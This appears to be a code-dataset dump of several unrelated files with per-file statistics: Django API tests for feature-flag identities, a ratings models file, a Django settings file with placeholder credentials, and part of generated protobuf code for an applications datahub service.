assert second_response.status_code == status.HTTP_400_BAD_REQUEST
assert identity_feature.count() == 1
def test_should_change_enabled_state_when_put(self):
# Given
feature = Feature.objects.create(name="feature1", project=self.project)
feature_state = FeatureState.objects.create(
feature=feature,
identity=self.identity,
enabled=False,
environment=self.environment,
)
# When
response = self.client.put(
self.feature_states_detail_url
% (self.identity.environment.api_key, self.identity.id, feature_state.id),
data=self.put_template % True,
content_type="application/json",
)
feature_state.refresh_from_db()
# Then
assert response.status_code == status.HTTP_200_OK
assert feature_state.enabled
def test_should_remove_identity_feature_when_delete(self):
# Given
feature_one = Feature.objects.create(name="feature1", project=self.project)
feature_two = Feature.objects.create(name="feature2", project=self.project)
identity_feature_one = FeatureState.objects.create(
feature=feature_one,
identity=self.identity,
enabled=False,
environment=self.environment,
)
FeatureState.objects.create(
feature=feature_two,
identity=self.identity,
enabled=True,
environment=self.environment,
)
# When
self.client.delete(
self.feature_states_detail_url
% (
self.identity.environment.api_key,
self.identity.id,
identity_feature_one.id,
),
content_type="application/json",
)
# Then
identity_features = FeatureState.objects.filter(identity=self.identity)
assert identity_features.count() == 1
def test_can_search_for_identities(self):
# Given
Identity.objects.create(identifier="user2", environment=self.environment)
base_url = reverse(
"api-v1:environments:environment-identities-list",
args=[self.environment.api_key],
)
url = "%s?q=%s" % (base_url, self.identifier)
# When
res = self.client.get(url)
# Then
assert res.status_code == status.HTTP_200_OK
# and - only identity matching search appears
assert res.json().get("count") == 1
def test_can_search_for_identities_with_exact_match(self):
# Given
identity_to_return = Identity.objects.create(
identifier="1", environment=self.environment
)
Identity.objects.create(identifier="12", environment=self.environment)
Identity.objects.create(identifier="121", environment=self.environment)
base_url = reverse(
"api-v1:environments:environment-identities-list",
args=[self.environment.api_key],
)
url = "%s?%s" % (base_url, urllib.parse.urlencode({"q": '"1"'}))
# When
res = self.client.get(url)
# Then
assert res.status_code == status.HTTP_200_OK
# and - only identity matching search appears
assert res.json().get("count") == 1
assert res.json()["results"][0]["id"] == identity_to_return.id
def test_search_is_case_insensitive(self):
# Given
Identity.objects.create(identifier="user2", environment=self.environment)
base_url = reverse(
"api-v1:environments:environment-identities-list",
args=[self.environment.api_key],
)
url = "%s?q=%s" % (base_url, self.identifier.upper())
# When
res = self.client.get(url)
# Then
assert res.status_code == status.HTTP_200_OK
# and - identity matching search appears
assert res.json().get("count") == 1
def test_no_identities_returned_if_search_matches_none(self):
# Given
base_url = reverse(
"api-v1:environments:environment-identities-list",
args=[self.environment.api_key],
)
url = "%s?q=%s" % (base_url, "some invalid search string")
# When
res = self.client.get(url)
# Then
assert res.status_code == status.HTTP_200_OK
# and
assert res.json().get("count") == 0
def test_search_identities_still_allows_paging(self):
# Given
self._create_n_identities(10)
base_url = reverse(
"api-v1:environments:environment-identities-list",
args=[self.environment.api_key],
)
url = "%s?q=%s&page_size=%s" % (base_url, "user", "10")
res1 = self.client.get(url)
second_page = res1.json().get("next")
# When
res2 = self.client.get(second_page)
# Then
assert res2.status_code == status.HTTP_200_OK
# and
assert res2.json().get("results")
def _create_n_identities(self, n):
for i in range(2, n + 2):
identifier = "user%d" % i
Identity.objects.create(identifier=identifier, environment=self.environment)
def test_can_delete_identity(self):
# Given
url = reverse(
"api-v1:environments:environment-identities-detail",
args=[self.environment.api_key, self.identity.id],
)
# When
res = self.client.delete(url)
# Then
assert res.status_code == status.HTTP_204_NO_CONTENT
# and
assert not Identity.objects.filter(id=self.identity.id).exists()
@pytest.mark.django_db
class SDKIdentitiesTestCase(APITestCase):
    def setUp(self) -> None:
        self.organisation = Organisation.objects.create(name="Test Org")
        self.project = Project.objects.create(
            organisation=self.organisation, name="Test Project"
        )
        self.environment = Environment.objects.create(
            project=self.project, name="Test Environment"
        )
        self.feature_1 = Feature.objects.create(
            project=self.project, name="Test Feature 1"
        )
        self.feature_2 = Feature.objects.create(
            project=self.project, name="Test Feature 2"
        )
        self.identity = Identity.objects.create(
            environment=self.environment, identifier="test-identity"
        )
        self.client.credentials(HTTP_X_ENVIRONMENT_KEY=self.environment.api_key)

    def tearDown(self) -> None:
        Segment.objects.all().delete()

    def test_identities_endpoint_returns_all_feature_states_for_identity_if_feature_not_provided(
        self,
    ):
        # Given
        base_url = reverse("api-v1:sdk-identities")
        url = base_url + "?identifier=" + self.identity.identifier

        # When
        response = self.client.get(url)

        # Then
        assert response.status_code == status.HTTP_200_OK

        # and
        assert len(response.json().get("flags")) == 2

    @mock.patch("integrations.amplitude.amplitude.AmplitudeWrapper.identify_user_async")
    def test_identities_endpoint_get_all_feature_amplitude_called(
        self, mock_amplitude_wrapper
    ):
        # Given
        # amplitude configuration for environment
        AmplitudeConfiguration.objects.create(
            api_key="abc-123", environment=self.environment
        )

        base_url = reverse("api-v1:sdk-identities")
        url = base_url + "?identifier=" + self.identity.identifier

        # When
        response = self.client.get(url)

        # Then
        assert response.status_code == status.HTTP_200_OK

        # and
        assert len(response.json().get("flags")) == 2

        # and amplitude identify users should be called
        mock_amplitude_wrapper.assert_called()

    @mock.patch("integrations.amplitude.amplitude.AmplitudeWrapper.identify_user_async")
    def test_identities_endpoint_returns_traits(self, mock_amplitude_wrapper):
        # Given
        base_url = reverse("api-v1:sdk-identities")
        url = base_url + "?identifier=" + self.identity.identifier
        trait = Trait.objects.create(
            identity=self.identity,
            trait_key="trait_key",
            value_type="STRING",
            string_value="trait_value",
        )

        # When
        response = self.client.get(url)

        # Then
        assert response.json().get("traits") is not None

        # and
        assert (
            response.json().get("traits")[0].get("trait_value")
            == trait.get_trait_value()
        )

        # and amplitude identify users should not be called
        mock_amplitude_wrapper.assert_not_called()

    def test_identities_endpoint_returns_single_feature_state_if_feature_provided(self):
        # Given
        base_url = reverse("api-v1:sdk-identities")
        url = (
            base_url
            + "?identifier="
            + self.identity.identifier
            + "&feature="
            + self.feature_1.name
        )

        # When
        response = self.client.get(url)

        # Then
        assert response.status_code == status.HTTP_200_OK

        # and
        assert response.json().get("feature").get("name") == self.feature_1.name

    @mock.patch("integrations.amplitude.amplitude.AmplitudeWrapper.identify_user_async")
    def test_identities_endpoint_returns_value_for_segment_if_identity_in_segment(
        self, mock_amplitude_wrapper
    ):
        # Given
        base_url = reverse("api-v1:sdk-identities")
        url = base_url + "?identifier=" + self.identity.identifier

        trait_key = "trait_key"
        trait_value = "trait_value"
        Trait.objects.create(
            identity=self.identity,
            trait_key=trait_key,
            value_type="STRING",
            string_value=trait_value,
        )

        segment = Segment.objects.create(name="Test Segment", project=self.project)
        segment_rule = SegmentRule.objects.create(
            segment=segment, type=SegmentRule.ALL_RULE
        )
        Condition.objects.create(
            operator="EQUAL", property=trait_key, value=trait_value, rule=segment_rule
        )

        feature_segment = FeatureSegment.objects.create(
            segment=segment,
            feature=self.feature_2,
            environment=self.environment,
            priority=1,
        )
        FeatureState.objects.create(
            feature=self.feature_2,
            feature_segment=feature_segment,
            environment=self.environment,
            enabled=True,
        )

        # When
        response = self.client.get(url)

        # Then
        assert response.status_code == status.HTTP_200_OK

        # and
        assert response.json().get("flags")[1].get("enabled")

        # and amplitude identify users should not be called
        mock_amplitude_wrapper.assert_not_called()

    @mock.patch("integrations.amplitude.amplitude.AmplitudeWrapper.identify_user_async")
    def test_identities_endpoint_returns_value_for_segment_if_identity_in_segment_and_feature_specified(
        self, mock_amplitude_wrapper
    ):
        # Given
        base_url = reverse("api-v1:sdk-identities")
        url = (
            base_url
            + "?identifier="
            + self.identity.identifier
            + "&feature="
            + self.feature_1.name
        )

        trait_key = "trait_key"
        trait_value = "trait_value"
        Trait.objects.create(
            identity=self.identity,
            trait_key=trait_key,
            value_type="STRING",
            string_value=trait_value,
        )

        segment = Segment.objects.create(name="Test Segment", project=self.project)
        segment_rule = SegmentRule.objects.create(
            segment=segment, type=SegmentRule.ALL_RULE
        )
        Condition.objects.create(
            operator="EQUAL", property=trait_key, value=trait_value, rule=segment_rule
        )

        feature_segment = FeatureSegment.objects.create(
            segment=segment,
            feature=self.feature_1,
            environment=self.environment,
            priority=1,
        )
        FeatureState.objects.create(
            feature_segment=feature_segment,
            feature=self.feature_1,
            environment=self.environment,
            enabled=True,
        )

        # When
        response = self.client.get(url)

        # Then
        assert response.status_code == status.HTTP_200_OK

        # and
        assert response.json().get("enabled")

        # and amplitude identify users should not be called
        mock_amplitude_wrapper.assert_not_called()

    @mock.patch("integrations.amplitude.amplitude.AmplitudeWrapper.identify_user_async")
    def test_identities_endpoint_returns_value_for_segment_if_rule_type_percentage_split_and_identity_in_segment(
        self, mock_amplitude_wrapper
    ):
        # Given
        base_url = reverse("api-v1:sdk-identities")
        url = base_url + "?identifier=" + self.identity.identifier

        segment = Segment.objects.create(name="Test Segment", project=self.project)
        segment_rule = SegmentRule.objects.create(
            segment=segment, type=SegmentRule.ALL_RULE
        )

        identity_percentage_value = get_hashed_percentage_for_object_ids(
            [segment.id, self.identity.id]
        )
        Condition.objects.create(
            operator=models.PERCENTAGE_SPLIT,
            value=(identity_percentage_value + (1 - identity_percentage_value) / 2)
            * 100.0,
            rule=segment_rule,
        )

        feature_segment = FeatureSegment.objects.create(
            segment=segment,
            feature=self.feature_1,
            environment=self.environment,
            priority=1,
        )
        FeatureState.objects.create(
            feature_segment=feature_segment,
            feature=self.feature_1,
            environment=self.environment,
            enabled=True,
        )

        # When
        self.client.credentials(HTTP_X_ENVIRONMENT_KEY=self.environment.api_key)
        response = self.client.get(url)

        # Then
        for flag in response.json()["flags"]:
            if flag["feature"]["name"] == self.feature_1.name:
                assert flag["enabled"]

        # and amplitude identify users should not be called
        mock_amplitude_wrapper.assert_not_called()

    @mock.patch("integrations.amplitude.amplitude.AmplitudeWrapper.identify_user_async")
    def test_identities_endpoint_returns_default_value_if_rule_type_percentage_split_and_identity_not_in_segment(
        self, mock_amplitude_wrapper
    ):
        # Given
        base_url = reverse("api-v1:sdk-identities")
        url = base_url + "?identifier=" + self.identity.identifier

        segment = Segment.objects.create(name="Test Segment", project=self.project)
        segment_rule = SegmentRule.objects.create(
            segment=segment, type=SegmentRule.ALL_RULE
        )

        identity_percentage_value = get_hashed_percentage_for_object_ids(
            [segment.id, self.identity.id]
        )
        Condition.objects.create(
            operator=models.PERCENTAGE_SPLIT,
            value=identity_percentage_value / 2,
            rule=segment_rule,
        )

        feature_segment = FeatureSegment.objects.create(
            segment=segment,
            feature=self.feature_1,
            environment=self.environment,
            priority=1,
        )
        FeatureState.objects.create(
            feature_segment=feature_segment,
            feature=self.feature_1,
            environment=self.environment,
            enabled=True,
        )

        # When
        self.client.credentials(HTTP_X_ENVIRONMENT_KEY=self.environment.api_key)
        response = self.client.get(url)

        # Then
        assert not response.json().get("flags")[0].get("enabled")

        # and amplitude identify users should not be called
        mock_amplitude_wrapper.assert_not_called()

    def test_post_identify_with_persistence(self):
        # Given
        url = reverse("api-v1:sdk-identities")

        # a payload for an identity with 2 traits
        data = {
            "identifier": self.identity.identifier,
            "traits": [
                {"trait_key": "my_trait", "trait_value": 123},
                {"trait_key": "my_other_trait", "trait_value": "a value"},
            ],
        }

        # When
        # we identify that user by posting the above payload
        self.client.credentials(HTTP_X_ENVIRONMENT_KEY=self.environment.api_key)
        response = self.client.post(
            url, data=json.dumps(data), content_type="application/json"
        )

        # Then
        # we get everything we expect in the response
        response_json = response.json()
        assert response_json["flags"]
        assert response_json["traits"]

        # and the traits ARE persisted
        assert self.identity.identity_traits.count() == 2

    def test_post_identify_without_persistence(self):
        # Given
        url = reverse("api-v1:sdk-identities")

        # an organisation configured to not persist traits
        self.organisation.persist_trait_data = False
        self.organisation.save()

        # and a payload for an identity with 2 traits
        data = {
            "identifier": self.identity.identifier,
            "traits": [
                {"trait_key": "my_trait", "trait_value": 123},
                {"trait_key": "my_other_trait", "trait_value": "a value"},
            ],
        }

        # When
        # we identify that user by posting the above payload
        self.client.credentials(HTTP_X_ENVIRONMENT_KEY=self.environment.api_key)
        response = self.client.post(
            url, data=json.dumps(data), content_type="application/json"
        )

        # Then
        # we get everything we expect in the response
        response_json = response.json()
        assert response_json["flags"]
        assert response_json["traits"]

        # and the traits ARE NOT persisted
        assert self.identity.identity_traits.count() == 0

    @override_settings(EDGE_API_URL="http://localhost")
    @mock.patch("environments.identities.views.forward_identity_request")
    def test_post_identities_calls_forward_identity_request_with_correct_arguments(
        self, mocked_forward_identity_request
    ):
        # Given
        url = reverse("api-v1:sdk-identities")
        data = {
            "identifier": self.identity.identifier,
            "traits": [
                {"trait_key": "my_trait", "trait_value": 123},
                {"trait_key": "my_other_trait", "trait_value": "a value"},
            ],
        }

        # When
        self.client.post(url, data=json.dumps(data), content_type="application/json")

        # Then
        args, kwargs = mocked_forward_identity_request.call_args_list[0]
        assert kwargs == {}
        assert isinstance(args[0], Request)
        assert args[0].data == data
        assert args[1] == self.environment.project.id

    @override_settings(EDGE_API_URL="http://localhost")
    @mock.patch("environments.identities.views.forward_identity_request")
    def test_get_identities_calls_forward_identity_request_with_correct_arguments(
        self, mocked_forward_identity_request
    ):
        # Given
        base_url = reverse("api-v1:sdk-identities")
        url = base_url + "?identifier=" + self.identity.identifier

        # When
        self.client.get(url)

        # Then
        args, kwargs = mocked_forward_identity_request.call_args_list[0]
        assert kwargs == {}
        assert isinstance(args[0], Request)
        assert args[1] == self.environment.project.id
| 34.112717 | 113 | 0.629882 | 2,559 | 23,606 | 5.589293 | 0.097304 | 0.043627 | 0.036356 | 0.018877 | 0.775012 | 0.721527 | 0.707754 | 0.662798 | 0.623156 | 0.587429 | 0 | 0.009148 | 0.272981 | 23,606 | 691 | 114 | 34.162084 | 0.824263 | 0.05452 | 0 | 0.559006 | 0 | 0 | 0.104185 | 0.051665 | 0 | 0 | 0 | 0 | 0.113872 | 1 | 0.055901 | false | 0 | 0.043478 | 0 | 0.115942 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
dbf5e8e1673361cdf8d898d6886a74a5e8b951c6 | 472 | py | Python | ratings/tests/models.py | Barolina/djangosnippets.org | 2b445764be4fd6d48371dee0486effa8687070d8 | [
"BSD-3-Clause"
] | null | null | null | ratings/tests/models.py | Barolina/djangosnippets.org | 2b445764be4fd6d48371dee0486effa8687070d8 | [
"BSD-3-Clause"
] | 1 | 2022-03-12T01:06:51.000Z | 2022-03-12T01:06:51.000Z | ratings/tests/models.py | Barolina/djangosnippets.org | 2b445764be4fd6d48371dee0486effa8687070d8 | [
"BSD-3-Clause"
] | null | null | null | from django.db import models
from ..models import RatedItemBase, Ratings


class Food(models.Model):
    name = models.CharField(max_length=50)
    ratings = Ratings()

    def __str__(self):
        return self.name


class BeverageRating(RatedItemBase):
    content_object = models.ForeignKey('Beverage')


class Beverage(models.Model):
    name = models.CharField(max_length=50)
    ratings = Ratings(BeverageRating)

    def __str__(self):
        return self.name
| 18.153846 | 50 | 0.707627 | 55 | 472 | 5.872727 | 0.436364 | 0.068111 | 0.092879 | 0.130031 | 0.489164 | 0.489164 | 0.340557 | 0.340557 | 0.340557 | 0.340557 | 0 | 0.010554 | 0.197034 | 472 | 25 | 51 | 18.88 | 0.841689 | 0 | 0 | 0.428571 | 0 | 0 | 0.016949 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.142857 | 0.142857 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 2 |
e013d3f7c3c05df9d72856b4604cd3f06879f997 | 79 | py | Python | utility/base64/ucube.py | jinlongliu/AliOS-Things | ce051172a775f987183e7aca88bb6f3b809ea7b0 | [
"Apache-2.0"
] | 30 | 2018-05-21T18:58:03.000Z | 2020-11-30T03:44:10.000Z | utility/base64/ucube.py | IamBaoMouMou/AliOS-Things | 195a9160b871b3d78de6f8cf6c2ab09a71977527 | [
"Apache-2.0"
] | 3 | 2018-12-17T13:06:46.000Z | 2018-12-28T01:40:59.000Z | utility/base64/ucube.py | IamBaoMouMou/AliOS-Things | 195a9160b871b3d78de6f8cf6c2ab09a71977527 | [
"Apache-2.0"
] | 16 | 2018-05-15T08:11:12.000Z | 2022-03-20T05:23:15.000Z | src = Split('''
base64.c
''')
component = aos_component('base64', src) | 15.8 | 40 | 0.582278 | 9 | 79 | 5 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.064516 | 0.21519 | 79 | 5 | 40 | 15.8 | 0.66129 | 0 | 0 | 0 | 0 | 0 | 0.263158 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e01deab92182bb405c91fec1268db70de4f57b17 | 4,380 | py | Python | app/app/settings.py | cosmos-sajal/recipe-app-api | 50541bf5d1e4bad3feea3ac749f0838a92ce647d | [
"MIT"
] | null | null | null | app/app/settings.py | cosmos-sajal/recipe-app-api | 50541bf5d1e4bad3feea3ac749f0838a92ce647d | [
"MIT"
] | null | null | null | app/app/settings.py | cosmos-sajal/recipe-app-api | 50541bf5d1e4bad3feea3ac749f0838a92ce647d | [
"MIT"
] | null | null | null | """
Django settings for app project.
Generated by 'django-admin startproject' using Django 3.0.4.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import datetime
import os
from datetime import timedelta

# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

ALLOWED_HOSTS = []

# Application definition

INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'rest_framework',
    'rest_framework_simplejwt.token_blacklist',
    'core',
    'user',
    'recipe',
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'app.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'app.wsgi.application'

# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases

DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.postgresql',
        'HOST': 'DB_HOST',
        'NAME': 'DB_NAME',
        'USER': 'DB_USER',
        'PASSWORD': 'DB_PASSWORD',
    }
}

# Redis Cache
CACHES = {
    'default': {
        'BACKEND': "django_redis.cache.RedisCache",
        'LOCATION': 'REDIS_LOCATION',
        'OPTIONS': {
            'CLIENT_CLASS': 'django_redis.client.DefaultClient'
        }
    }
}

CACHE_TTL = 60 * 15

# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]

# JWT settings
# REST_FRAMEWORK = {
#     'DEFAULT_AUTHENTICATION_CLASSES': (
#         'rest_framework_simplejwt.authentication.JWTAuthentication'
#     )
# }

SIMPLE_JWT = {
    'ACCESS_TOKEN_LIFETIME': timedelta(minutes=5),
    'REFRESH_TOKEN_LIFETIME': timedelta(days=365),
    'ROTATE_REFRESH_TOKENS': True,
    'BLACKLIST_AFTER_ROTATION': True,
    'ALGORITHM': 'HS256',
    'SIGNING_KEY': 'KEY',
    'VERIFYING_KEY': None,
    'AUDIENCE': None,
    'ISSUER': None,
    'AUTH_HEADER_TYPES': ('Bearer',),
    'USER_ID_FIELD': 'id',
    'USER_ID_CLAIM': 'user_id',
    'AUTH_TOKEN_CLASSES': ('rest_framework_simplejwt.tokens.AccessToken',),
    'TOKEN_TYPE_CLAIM': 'token_type',
    'JTI_CLAIM': 'jti',
    'SLIDING_TOKEN_REFRESH_EXP_CLAIM': 'refresh_exp',
    'SLIDING_TOKEN_LIFETIME': timedelta(minutes=5),
    'SLIDING_TOKEN_REFRESH_LIFETIME': timedelta(days=1),
}

# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/

LANGUAGE_CODE = 'en-us'

TIME_ZONE = 'UTC'

USE_I18N = True

USE_L10N = True

USE_TZ = True

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/

STATIC_URL = '/static/'

AUTH_USER_MODEL = 'core.User'

EXPIRING_TOKEN_LIFESPAN = datetime.timedelta(seconds=20)
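A quick standalone check of the token lifetimes configured in `SIMPLE_JWT` above (illustrative only; this does not import the Django settings module):

```python
from datetime import timedelta

# Same values as SIMPLE_JWT above.
ACCESS_TOKEN_LIFETIME = timedelta(minutes=5)
REFRESH_TOKEN_LIFETIME = timedelta(days=365)

# With ROTATE_REFRESH_TOKENS and BLACKLIST_AFTER_ROTATION both True, each
# refresh issues a new refresh token and blacklists the old one, so a client
# stays logged in as long as it refreshes within the refresh lifetime.
print(ACCESS_TOKEN_LIFETIME.total_seconds())  # 300.0
print(REFRESH_TOKEN_LIFETIME.days)            # 365
```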
| 25.028571 | 91 | 0.679224 | 472 | 4,380 | 6.120763 | 0.413136 | 0.067497 | 0.053306 | 0.060575 | 0.178262 | 0.146417 | 0.09242 | 0.09242 | 0.041537 | 0 | 0 | 0.010617 | 0.182877 | 4,380 | 174 | 92 | 25.172414 | 0.796591 | 0.246119 | 0 | 0.038095 | 1 | 0 | 0.534067 | 0.387412 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.057143 | 0.019048 | 0 | 0.019048 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
e027464baf813e0d049a2e9cf3bc3d930a2f706b | 11,714 | py | Python | vendor/github.com/containers-ai/api/alameda_api/v1alpha1/datahub/applications/services_pb2.py | imhd/alameda | a82b009133f53bd5406b3ff371453907192d0f75 | [
"Apache-2.0"
] | null | null | null | vendor/github.com/containers-ai/api/alameda_api/v1alpha1/datahub/applications/services_pb2.py | imhd/alameda | a82b009133f53bd5406b3ff371453907192d0f75 | [
"Apache-2.0"
] | null | null | null | vendor/github.com/containers-ai/api/alameda_api/v1alpha1/datahub/applications/services_pb2.py | imhd/alameda | a82b009133f53bd5406b3ff371453907192d0f75 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: alameda_api/v1alpha1/datahub/applications/services.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from alameda_api.v1alpha1.datahub.applications import applications_pb2 as alameda__api_dot_v1alpha1_dot_datahub_dot_applications_dot_applications__pb2
from alameda_api.v1alpha1.datahub.applications import types_pb2 as alameda__api_dot_v1alpha1_dot_datahub_dot_applications_dot_types__pb2
from alameda_api.v1alpha1.datahub.schemas import types_pb2 as alameda__api_dot_v1alpha1_dot_datahub_dot_schemas_dot_types__pb2
from google.rpc import status_pb2 as google_dot_rpc_dot_status__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='alameda_api/v1alpha1/datahub/applications/services.proto',
package='containersai.alameda.v1alpha1.datahub.applications',
syntax='proto3',
serialized_options=_b('ZFgithub.com/containers-ai/api/alameda_api/v1alpha1/datahub/applications'),
serialized_pb=_b('\n8alameda_api/v1alpha1/datahub/applications/services.proto\x12\x32\x63ontainersai.alameda.v1alpha1.datahub.applications\x1a<alameda_api/v1alpha1/datahub/applications/applications.proto\x1a\x35\x61lameda_api/v1alpha1/datahub/applications/types.proto\x1a\x30\x61lameda_api/v1alpha1/datahub/schemas/types.proto\x1a\x17google/rpc/status.proto\"\xc7\x01\n\x19\x43reateApplicationsRequest\x12N\n\x0bschema_meta\x18\x01 \x01(\x0b\x32\x39.containersai.alameda.v1alpha1.datahub.schemas.SchemaMeta\x12Z\n\x0c\x61pplications\x18\x02 \x03(\x0b\x32\x44.containersai.alameda.v1alpha1.datahub.applications.WriteApplication\"\xc4\x01\n\x17ListApplicationsRequest\x12N\n\x0bschema_meta\x18\x01 \x01(\x0b\x32\x39.containersai.alameda.v1alpha1.datahub.schemas.SchemaMeta\x12Y\n\x0c\x61pplications\x18\x02 \x03(\x0b\x32\x43.containersai.alameda.v1alpha1.datahub.applications.ReadApplication\"\x95\x01\n\x18ListApplicationsResponse\x12\"\n\x06status\x18\x01 \x01(\x0b\x32\x12.google.rpc.Status\x12U\n\x0c\x61pplications\x18\x02 \x01(\x0b\x32?.containersai.alameda.v1alpha1.datahub.applications.Application\"\xc8\x01\n\x19\x44\x65leteApplicationsRequest\x12N\n\x0bschema_meta\x18\x01 \x01(\x0b\x32\x39.containersai.alameda.v1alpha1.datahub.schemas.SchemaMeta\x12[\n\x0c\x61pplications\x18\x02 \x03(\x0b\x32\x45.containersai.alameda.v1alpha1.datahub.applications.DeleteApplicationBHZFgithub.com/containers-ai/api/alameda_api/v1alpha1/datahub/applicationsb\x06proto3')
,
dependencies=[alameda__api_dot_v1alpha1_dot_datahub_dot_applications_dot_applications__pb2.DESCRIPTOR,alameda__api_dot_v1alpha1_dot_datahub_dot_applications_dot_types__pb2.DESCRIPTOR,alameda__api_dot_v1alpha1_dot_datahub_dot_schemas_dot_types__pb2.DESCRIPTOR,google_dot_rpc_dot_status__pb2.DESCRIPTOR,])
_CREATEAPPLICATIONSREQUEST = _descriptor.Descriptor(
name='CreateApplicationsRequest',
full_name='containersai.alameda.v1alpha1.datahub.applications.CreateApplicationsRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='schema_meta', full_name='containersai.alameda.v1alpha1.datahub.applications.CreateApplicationsRequest.schema_meta', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='applications', full_name='containersai.alameda.v1alpha1.datahub.applications.CreateApplicationsRequest.applications', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=305,
serialized_end=504,
)
_LISTAPPLICATIONSREQUEST = _descriptor.Descriptor(
name='ListApplicationsRequest',
full_name='containersai.alameda.v1alpha1.datahub.applications.ListApplicationsRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='schema_meta', full_name='containersai.alameda.v1alpha1.datahub.applications.ListApplicationsRequest.schema_meta', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='applications', full_name='containersai.alameda.v1alpha1.datahub.applications.ListApplicationsRequest.applications', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=507,
serialized_end=703,
)
_LISTAPPLICATIONSRESPONSE = _descriptor.Descriptor(
name='ListApplicationsResponse',
full_name='containersai.alameda.v1alpha1.datahub.applications.ListApplicationsResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
